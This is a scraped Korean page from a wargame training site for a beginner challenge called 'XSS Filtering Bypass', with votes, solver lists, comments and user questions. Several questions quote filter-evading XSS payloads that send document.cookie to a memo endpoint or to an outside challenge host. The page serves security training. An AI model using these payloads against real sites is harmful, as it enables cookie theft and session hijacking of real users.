학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 1
XSS Filtering Bypass
web
5008
2252
로그인 하고 문제 풀기
문제 정보
풀이
79
난이도 투표
88
질문
8
최근 풀이자
2252
댓글
31
문제 설명
Description
Exercise: XSS Filtering Bypass에서 실습하는 문제입니다.
문제 수정 내역
2023.08.04 Dockerfile 제공
Translate
난이도 투표
88
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 18
meowyeok
대표 업적 없음
LEVEL 1에 투표했습니다.
3일 전
캔디스
대표 업적 없음
LEVEL 1에 투표했습니다.
6일 전
ingko
대표 업적 없음
LEVEL 1에 투표했습니다.
6일 전
N0ame
대표 업적 없음
LEVEL 2에 투표했습니다.
7일 전
aarin9809
대표 업적 없음
LEVEL 2에 투표했습니다.
8일 전
질문
8
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
문제 해결 방법 문의
이 문제를 해결하는 방법으로 document.cookie 값을 다른 곳에 찍는 식으로 해결하는 것이 일반적인 방법인 것 같은데... 혹시 되나 싶어서 alert(document.cookie)로도 시도해 봤는데 요청은 가는 거 같은데 alert 창이 표시되지는 않네요ㅠㅠ 혹시 이유를 아시는 분이 있으실까여
만디
답변
1
추천
0
9개월 전
location.href 우회에 대한 질문이 있습니다.
script -> on -> javascript 순서로 검사를 진행해서 <script>는 <scrionpt>처럼 script 가운데에 on을 집어넣는 방식으로 우회가 가능했습니다. 그런데 왜 location.href는 locatiojavascriptn.href 처럼 o와 n 사이에 javascript를 넣어도 우회가 안되고 꼭 document['locatio'+'n']으로 우회해야 되나요? 코드는 아래 처럼 짰습니다. <scrionpt>locatiojavascriptn.href="/memo?memo="+document.cookie</sconript>
화려한치킨
답변
1
추천
0
3년 전
이미지 src와 onerror 차이?
`` <img src="" onerror="<scscriptript>...">`` ``<img src="<scscriptript>..." onerror=""> `` 왜 src속성에 하면 안되고 onerror 속성에 스크립트를 써야 되나여?? <img src="" oonnerror="locatioonn.href=+'/memo?memo='+document.cookie"> <img src="" oonnerror="locatioonn.href='/memo?memo='+document.cookie"> 두 코드의 차이점은 무엇인가요? +를 왜 뒤에만 붙여야 적용 되는건가요??
chwrld
답변
2
추천
0
2년 전
<script src 로 문제를 해결할수 있을까요?(csp bypass 구문 입력)
제가 생각한건 csp bypass에서 제공된 아래 문구로 기입했으나 실패하여 문의드립니다. <scronipt src="/vuln?param=locatioonn.href='/memo?memo='%2bdocument.cookie"></scrionpt>
takiki
답변
1
추천
0
5개월 전
필터링 우회 관련해서 질문이 있습니다
<scrscriptipt>locatioonn.href=’/memo?memo=’ +document.cookie</scriscriptpt> 요런식으로 vuln페이지에서 잘 넘어가는거같던데 flag에 했을당시 hello로 뜨더라구요... 이유를 알수 있을까요??
탈퇴한 이용자
답변
2
추천
0
2년 전
다른방식의 접근
안녕하세요 해당문제를 푼지도 시간이 오래되었는데 다시 다른방법으로 풀려고하니 아직좀 부족한 면이 많은걸 느끼네요 ㅎㅎ... 해당 문제에 다른 질문이 있어 여쭤보게되었습니다. 해당 문제에서 필터링을 "on", "script", "javascript" 이 세 단어를 필터링을 하고있는데, 해당 페이로드들을 입력했을시에 /vuln 페이지에서 alert()가 안뜨더라구요. <iframe%20src="\1\4jAVasC\triPT:alert(document.domain)"> (Not Found 404) 에러를 받았습니다. 혹시 이유를 알수 있을까 해서 질문 남깁니다! 감사합니다 ㅎㅎ
탈퇴한 이용자
답변
1
추천
0
2년 전
location.href를 쓰는 이유?
풀이 강의를 보기 전 아래와 같은 코드를 사용했는데 플래그 값이 아닌 hello만 적히는데 왜 그러는지 궁금합니다! <scrscriptipt>memo_text=document.cookie</scrscriptipt> 같은 맥락의 질문인 것 같은데 풀이 강의에서 location.href를 사용하는 이유가 뭔가요?
ssongk
답변
1
추천
0
3년 전
href 주소 질문
location.href를 이용한 풀이에서 1번 <img src=1 oonnerror='locatioonn.href="http://host3.dreamhack.games:RANDOM_NUMBER/" + document.cookie' /> 2번 <img src=1 oonnerror='locatioonn.href="/memo?memo=" + document.cookie' /> 2번은 되는데 1번은 안되는 이유가 뭔지 알고 싶습니다.
lining121
답변
0
추천
0
2년 전
«
‹
1
›
»
LEVEL 1
XSS Filtering Bypass
web
5008
2252
로그인 하고 문제 풀기
출제자 정보
Dreamhack
대표 업적 없음
2022.03.31. 11:52:26
First Blood!
as3617
워게임 고인물
출제된 지
2시간
만에 풀이 완료!
최근 풀이자
2252
묵은지볶음밥
대표 업적 없음
40분 전
Krako
대표 업적 없음
3시간 전
hwajin
대표 업적 없음
4시간 전
100050
대표 업적 없음
4시간 전
Nomad_
대표 업적 없음
9시간 전
IMYMIN
주니어
11시간 전
개복치
대표 업적 없음
12시간 전
seo1
대표 업적 없음
15시간 전
hlimi
대표 업적 없음
1일 전
pseudostate
대표 업적 없음
1일 전
«
‹
1
2
3
4
5
›
»
댓글
31
어제의 나보다 나아진 오늘을 희망하며
시니어
1개월 전
어제의 나보단 오늘의 나가 더 낫겠지 희망하며
Translate
le0ng
웹해킹 입문
1년 전
페이로드를 다시 확인하기
Translate
O_F
대표 업적 없음
2년 전
좋습니다.
Translate
T0pCcr4t
대표 업적 없음
2년 전
포기만 하지 맙시다.
Translate
buaii
워게임 고인물
2년 전
빙빙 돌아서 들어가기
Translate
d0r1
새싹
2년 전
그 전이랑 다른게 없,,네?
Translate
해킹배우고시퍼요
대표 업적 없음
2년 전
location도 필터링됨 ㅋㅋㅋ
Translate
Code-SHD
대표 업적 없음
2년 전
good
Translate
l000wk3y
공부벌레
2년 전
아주 간단한 방법으로 우회 가능한 필터링입니다.
Translate
룹
대표 업적 없음
2년 전
https://tools.dreamhack.games/requestbin ->을 이용해서QueryString을 확인. script on 우회.
Translate
«
‹
1
2
3
4
›
»
댓글 31